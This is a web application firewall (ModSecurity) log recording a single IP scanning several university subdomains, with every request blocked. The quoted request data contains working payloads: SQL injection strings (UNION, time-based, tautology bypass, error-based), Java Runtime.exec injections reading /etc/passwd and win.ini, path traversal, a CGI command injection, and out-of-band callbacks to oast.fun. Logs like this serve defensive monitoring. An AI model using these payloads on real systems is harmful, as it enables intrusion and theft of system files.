[Tue Aug 29 11:30:55.328197 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOM4a8AAAAU"]
[Tue Aug 29 11:30:55.371474 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10f8Co-f0AAAPMmEsAAAAY"]
[Tue Aug 29 11:30:55.376420 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAPDn2QAAAAP"]
[Tue Aug 29 11:30:55.403734 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAO87@kAAAAF"]
[Tue Aug 29 11:30:55.405245 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOM4bEAAAAU"]
[Tue Aug 29 11:30:55.409157 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAOOubQAAAAW"]
[Tue Aug 29 11:30:55.423691 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAPPSzYAAAAd"]
[Tue Aug 29 11:30:55.425257 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAO87@oAAAAF"]
[Tue Aug 29 11:30:55.427503 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAN@5BEAAAAO"]
[Tue Aug 29 11:30:56.315439 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPRNd4AAAAf"]
[Tue Aug 29 11:30:56.315686 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAP05HMAAAAA"]
[Tue Aug 29 11:30:56.324201 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAOM4bMAAAAU"]
[Tue Aug 29 11:30:56.334883 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAPOhccAAAAa"]
[Tue Aug 29 11:30:56.342045 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPLwBsAAAAX"]
[Tue Aug 29 11:30:56.351918 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAN@5BMAAAAO"]
[Tue Aug 29 11:30:56.364331 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAP05HUAAAAA"]
[Tue Aug 29 11:30:56.364628 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPLwBwAAAAX"]
[Tue Aug 29 11:30:56.381068 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAPPSzkAAAAd"]
[Tue Aug 29 11:30:56.384052 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAOM4bUAAAAU"]
[Tue Aug 29 11:30:56.387136 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/account"] [unique_id "ZO10gMCo-f0AAAPLwB0AAAAX"]
[Tue Aug 29 11:30:56.387945 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAOKNs4AAAAK"]
[Tue Aug 29 11:30:56.405614 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPRNeEAAAAf"]
[Tue Aug 29 11:30:57.409309 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gcCo-f0AAAN@5BkAAAAO"]
[Tue Aug 29 11:30:57.428873 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gcCo-f0AAAPLwCMAAAAX"]
[Tue Aug 29 11:30:58.303562 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAP05H0AAAAA"]
[Tue Aug 29 11:30:58.380752 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPxBWsAAAAS"]
[Tue Aug 29 11:30:58.384793 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPMmFgAAAAY"]
[Tue Aug 29 11:30:58.408609 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPLwCkAAAAX"]
[Tue Aug 29 11:30:58.423801 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPRNekAAAAf"]
